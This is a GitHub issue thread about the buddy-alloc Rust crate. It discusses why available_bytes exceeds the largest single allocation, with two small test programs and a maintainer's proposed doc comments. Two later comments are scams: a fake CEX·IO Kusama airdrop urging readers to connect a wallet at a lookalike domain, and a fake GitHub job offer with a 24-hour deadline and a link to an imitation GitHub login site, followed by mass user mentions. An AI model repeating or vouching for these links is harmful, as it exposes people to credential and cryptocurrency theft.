### ISSUE TITLE
Understanding the meaning of "available_bytes"

### ISSUE THREAD

**Issue by hellertime** [jjyr/buddy-alloc#7]
I built a simple test of the buddy-alloc, which builds a 1MiB heap, and tries to allocate all of it.

First thing I noticed is that the heap I end up with in the allocator is smaller than my 1MiB heap.

I think this is due to the base_ptr getting aligned past the start of my buffer, but I'd like to confirm that is the case, or if that isn't expected.

The second thing I noticed is that if I try to allocate all the available bytes, I get back a null pointer from the call to malloc, this I didn't expect, as the call to available_bytes claims I have this many bytes to allocate.

I may have overlooked some fixed overhead each allocation needs, although perhaps if there is such overhead, it would make sense for available_bytes to reflect that in its response?

Here is a small test case that highlights what I'm seeing:

```rust
use buddy_alloc::buddy_alloc::BuddyAlloc;
use buddy_alloc::BuddyAllocParam;

fn main() {
    let (layout, mut alloc) = unsafe {
        let layout = std::alloc::Layout::from_size_align_unchecked(1<<20, 4096);
        let data = std::alloc::alloc(layout) as *mut u8;
        let alloc = BuddyAlloc::new(BuddyAllocParam::new(data, layout.size(), layout.align()));
        (layout, alloc)
    };
    println!("layout size: {}. allocator size {}.", layout.size(), alloc.available_bytes());
    let ptr = alloc.malloc(alloc.available_bytes());
    assert!(! ptr.is_null());
    alloc.free(ptr);
}
```

**Comment by hellertime** [comment]
Further digging I come up with this program which highlights things a bit more clearly:

```rust
use buddy_alloc::buddy_alloc::BuddyAlloc;
use buddy_alloc::BuddyAllocParam;

fn main() {
    let (layout, mut alloc) = unsafe {
        let layout = std::alloc::Layout::from_size_align_unchecked(1<<20, 4096);
        let data = std::alloc::alloc(layout) as *mut u8;
        let alloc = BuddyAlloc::new(BuddyAllocParam::new(data, layout.size(), layout.align()));
        (layout, alloc)
    };
    println!("layout size: {}. allocator size {}.", layout.size(), alloc.available_bytes());
    let ptr = alloc.malloc((layout.align()/2)+1+(alloc.available_bytes() / 2));
    assert!(! ptr.is_null());
    alloc.free(ptr);
}
```

It would appear we can allocate up to `(layout.align()/2)+(alloc.available_bytes() / 2)` bytes from an empty allocator, but not one byte more. That makes sense given the buddy algorithm, but it still indicates that perhaps available_bytes is unclear in its purpose.

**Comment by jjyr** [comment]
IMO we can add comments to hint users. And we can add another function to return the maximum allocatable size.

```
/// Returns the maximum size that this allocator can allocate at once.
fn max_allocate_size()

/// Returns the number of bytes currently available for allocation by this allocator.
/// Note that, due to the buddy allocation algorithm used, the available bytes may 
/// not be able to allocate all at once.
fn available_bytes()
```

**Comment by kusamanetworkss** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)

**Comment by leojin** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
ulopong, @dylanhogg, @airbornelamb, @shuveb, @cgerling, @LA1CH3, @thiagoghisi, @thirdy, @lawrencegripper, @manihamidi, @fuhsjr00, @waggertron, @alirezahabib, @xykj61, @jkrol2, @prastut, @sibukixxx, @snario, @macmutsaers, @amisolution
